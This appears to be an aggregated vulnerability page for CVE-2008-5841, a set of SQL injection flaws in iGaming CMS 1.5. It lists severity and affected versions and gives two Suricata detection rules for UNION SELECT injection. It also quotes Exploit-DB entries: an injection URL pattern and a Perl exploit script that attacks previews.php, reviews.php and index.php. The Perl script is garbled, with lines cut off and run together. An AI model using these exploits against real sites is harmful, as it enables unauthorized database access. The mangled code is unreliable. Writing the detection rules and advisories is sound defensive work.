CVE-2008-5841
Published 2009-01-05
Priority P339 | high | 7.5 (CVSS 2.0)
AV:N/AC:L/Au:N/C:P/I:P/A:P
EXPLOIT
EPSS: 1.02% (59.0th percentile)
Multiple SQL injection vulnerabilities in iGaming 1.5 and earlier allow remote attackers to execute arbitrary SQL commands via the browse parameter to (1) previews.php and (2) reviews.php, and the (3) id parameter to index.php in a viewarticle action.
Affected
3 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| igamingcms | igaming_cms | <= 1.5 | — |
| igamingcms | igaming_cms | — | — |
| igamingcms | igaming_cms | — | — |
Suricata
ET WEB_SPECIFIC_APPS iGaming CMS previews.php browse parameter SQL injection
suricata·2010-07-30
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS iGaming CMS previews.php browse parameter SQL injection"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"/previews.php?"; nocase; content:"browse="; nocase; content:"UNION"; nocase; content:"SELECT"; nocase; pcre:"/UNION.+SELECT/i"; reference:cve,2008-5841; reference:bugtraq,31340; reference:url,milw0rm.com/exploits/6540; classtype:web-application-attack; sid:2009068; rev:6; metadata:affected_product Web_Server_Applications, attack_target Web_Server, created_at 2010_07_30, cve CVE_2008_5841, deployment Datacenter, signature_severity Major, tag SQL_Injection, updated_at 2020_09_04, mitre_tactic_id TA0001,
Suricata
ET WEB_SPECIFIC_APPS iGaming CMS reviews.php browse parameter SQL injection
suricata·2010-07-30
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS iGaming CMS reviews.php browse parameter SQL injection"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"/reviews.php?"; nocase; content:"browse="; nocase; content:"UNION"; nocase; content:"SELECT"; nocase; pcre:"/UNION.+SELECT/i"; reference:cve,2008-5841; reference:bugtraq,31340; reference:url,milw0rm.com/exploits/6540; classtype:web-application-attack; sid:2009069; rev:6; metadata:affected_product Web_Server_Applications, attack_target Web_Server, created_at 2010_07_30, cve CVE_2008_5841, deployment Datacenter, signature_severity Major, tag SQL_Injection, updated_at 2020_09_04, mitre_tactic_id TA0001, mi
Exploit-DB
iGaming CMS - Multiple SQL Injections
exploitdb·2010-08-27
---
# Exploit Title: iGamingCMS1.5 multiple vulnerabilities
# Date: 27/08/2010
# Author: Sweet
# Contact : [email protected]
# Software Link: http://www.igamingcms.com/
# Download: http://forums.igamingcms.com/forumdisplay.php?f=5
# Version: 1.5
# Tested on: WinXp sp3
# Risk: high
# Description: iGaming CMS is a content management system designed for gaming websites.
1-SQL injection:
http://www.example.com/igamingpath/games.php?order=1[SQLi]§[email protected]&sort=desc
2-Blind injection:
http://ww
Exploit-DB
iGaming CMS 1.5 - Multiple SQL Injections
exploitdb·2008-09-23
---
#!/usr/bin/perl
# ----------------------------------------------------------
# iGaming agent("Mozilla/4.5 [en] (Win95; U)");
$http->timeout(1);
if($host !~ /^http:\/\/(.+?)$/)
{
print "[?] iGaming CMS get($host.'/previews.php?browse='.$exec);
$two = $http->get($host.'/reviews.php?browse='.$exec);
$xxx = $http->get($host.'/index.php?do=viewarticle&id='.$view);
if($one->is_success or $two->is_success or $xxx->is_success)
{
die "$1\n" if $one->content =~ /%(.+?)%/;
die "$1\n" if $two->content =~ /%(.+?)%/;
die "$1\n" if $xxx->content =~ /%(.+?)%/;
}
else
{
die "[+] Exploit Failed!\n";
}
}
# milw0rm.com [2008-09-23]
No writeups or analysis indexed.
http://securityreason.com/securityalert/4867
http://www.securityfocus.com/bid/31340
https://exchange.xforce.ibmcloud.com/vulnerabilities/45366
https://www.exploit-db.com/exploits/6540
Published: 2009-01-05